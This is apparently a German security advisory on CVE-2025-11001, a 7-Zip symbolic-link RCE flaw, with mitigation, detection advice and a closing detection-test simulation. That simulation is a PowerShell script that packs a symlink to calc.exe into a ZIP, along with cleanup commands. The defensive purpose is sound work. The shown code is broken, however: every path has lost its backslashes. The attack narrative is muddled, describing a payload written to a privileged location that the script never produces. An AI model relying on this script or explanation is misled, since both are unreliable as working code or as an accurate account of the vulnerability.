CVE-2025-11001: NHS warnt vor PoC-Exploit für 7-Zip Symbolic Link-basierte RCE-Sicherheitslücke

Zusammenfassung

Verteidiger haben eine Remote-Code-Ausführungsverletzlichkeit in 7-Zip (CVE-2025-11001) offengelegt, die durch speziell gestaltete ZIP-Archive ausgelöst wird, die symbolische Links enthalten. NHS England Digital veröffentlichte eine Warnung, die auf die Verfügbarkeit von Proof-of-Concept (PoC)-Exploit-Code hinwies, während betont wurde, dass zu diesem Zeitpunkt keine bestätigte Ausnutzung in freier Wildbahn festgestellt worden war. Das Problem betrifft hauptsächlich Windows-Umgebungen und kann von Gegnern ausgenutzt werden, die Zugriff auf ein Dienstkonto erlangen. Eine nachfolgende Aktualisierung der Warnung klärte, dass trotz anfänglicher Bedenken keine aktive Ausnutzung beobachtet worden war.

Analyse von CVE-2025-11001

Forscher haben festgestellt, dass CVE-2025-11001 auf einen Pfadumgehungsfehler zurückzuführen ist, wie 7-Zip symbolische Links in ZIP-Dateien verarbeitet. Trend Micros Zero Day Initiative hob die potenziellen Auswirkungen hervor, und ein Sicherheitsforscher veröffentlichte ein PoC, das die praktische Ausführung von Code über den Fehler zeigt. NHS England Digital verfolgte Telemetrie auf Anzeichen einer Ausnutzung und erteilte Anleitungen, die durch diese Forschungsergebnisse und Bedrohungsintelligenzberichte informiert wurden.

Minderung

Um das Risiko zu mindern, sollten Benutzer auf 7-Zip Version 25.00 upgraden, die sowohl CVE-2025-11001 als auch CVE-2025-11002 anspricht. Organisationen sollten dieses Update auf Systemen priorisieren, auf denen 7-Zip mit erhöhten Rechten oder Entwickler-Tooling ausgeführt wird. Zusätzliche Härtungsmaßnahmen umfassen das Blockieren der Ausführung unzuverlässiger Archive, die Einschränkung, wer 7-Zip auf sensiblen Hosts ausführen kann, und das Überwachen auf ungewöhnliches Prozessverhalten im Zusammenhang mit der Archivverarbeitung.

Reaktion

Erkennungs- und Reaktionsteams sollten auf 7-Zip-Prozesse achten, die aus unzuverlässigen Pfaden gestartet wurden, und auf anomale symbolische Link-Erstellungen in temporären oder benutzerbeschreibbaren Verzeichnissen. Generieren Sie Warnungen, wenn Hochprivilegien-Prozesse aus 7-Zip-Aktivitäten stammen und korrelieren Sie diese Signale mit Windows-Ereignisprotokollen, um potenzielle Code-Ausführungsversuche zu erkennen. Stellen Sie sicher, dass der neueste 7-Zip-Patch installiert ist und verstärken Sie die Richtlinien für die Ausführung mit minimalen Privilegien über alle Endpunkte hinweg.

Simulationsausführung

Voraussetzung: Der Telemetrie- & Baseline-Vorcheck muss bestanden werden.

Begründung: In diesem Abschnitt werden die genaue Ausführung der gegnerischen Technik (TTP) und das Auslösen der Erkennungsregel detailliert beschrieben. Die Befehle und der Text MÜSSEN die identifizierten TTPs direkt widerspiegeln und sollen die genaue Telemetrie erzeugen, die von der Erkennungslogik erwartet wird.

• Angriffserzählung & Befehle:
  Ein Gegner erstellt ein bösartiges Archiv namens “7‑Zip 21.02_exploit.zip” das einen symbolischen Link enthält, der auf C:WindowsSystem32calc.exe zeigt. Wenn das Opfer das Archiv mit einer verwundbaren 7-Zip-Version (21.02) extrahiert, wird der symbolische Link aufgelöst, wodurch sichergestellt wird, dass die Angreifer-kontrollierte Nutzlast an einem privilegierten Ort geschrieben und anschließend ausgeführt wird, was eine Remote-Code-Ausführung über CVE‑2025‑11001 erreicht.

  Schritte, die auf der Arbeitsstation des Angreifers ausgeführt werden (lokal simuliert):

  1. Erstellen Sie einen symbolischen Link link_to_calc der auf C:WindowsSystem32calc.exe.
  2. Verpacken Sie den Symlink in eine ZIP-Datei, deren Name die genaue Zeichenkette „7-Zip 21.02“ enthält.
  3. Übertragen Sie das ZIP auf den Zielhost (simuliert durch Kopieren in einen überwachten Ordner).

• Regression Test Skript: Das folgende PowerShell-Skript reproduziert die oben genannten Aktionen auf der Zielmaschine. Es wird davon ausgegangen, dass der aktuelle Benutzer das Recht hat, symbolische Links zu erstellen (SeCreateSymbolicLinkPrivilege).

  # Simulationsskript – erstellt ein bösartiges ZIP, das die Sigma-Regel auslösen sollte
  # Voraussetzung: Als Administrator ausführen, um einen Symlink zu erstellen
  
  # 1. Pfade definieren
  $tempDir   = "$env:Tempziptp"
  $linkPath  = "$tempDirlink_to_calc"
  $targetExe = "$env:WINDIRSystem32calc.exe"
  $zipPath   = "$tempDir7-Zip 21.02_exploit.zip"
  
  # 2. Arbeitsverzeichnis vorbereiten
  New-Item -ItemType Directory -Force -Path $tempDir | Out-Null
  
  # 3. Symbolischen Link erstellen (Dateityp)
  cmd /c mklink "$linkPath" "$targetExe" | Out-Null
  
  # 4. Linkerstellung überprüfen
  if (-not (Test-Path $linkPath -PathType Leaf)) {
      Write-Error "Symbollink konnte nicht erstellt werden."
      exit 1
  }
  
  # 5. Den Symlink mit 7-Zip in ein ZIP-Archiv einfügen (vorausgesetzt, 7z.exe befindet sich im PATH)
  & 7z a -tzip -slink "$zipPath" "$linkPath" | Out-Null
  
  # 6. Temporären Link entfernen (das ZIP zur Erkennung behalten)
  Remove-Item $linkPath -Force
  
  Write-Host "Malicious ZIP created at $zipPath"

• Säuberungsbefehle: Entfernen Sie das Artefakt nach der Verifizierung.

  $tempDir = "$env:Tempziptp"
  Remove-Item -Recurse -Force $tempDir
  Write-Host "Bereinigung abgeschlossen."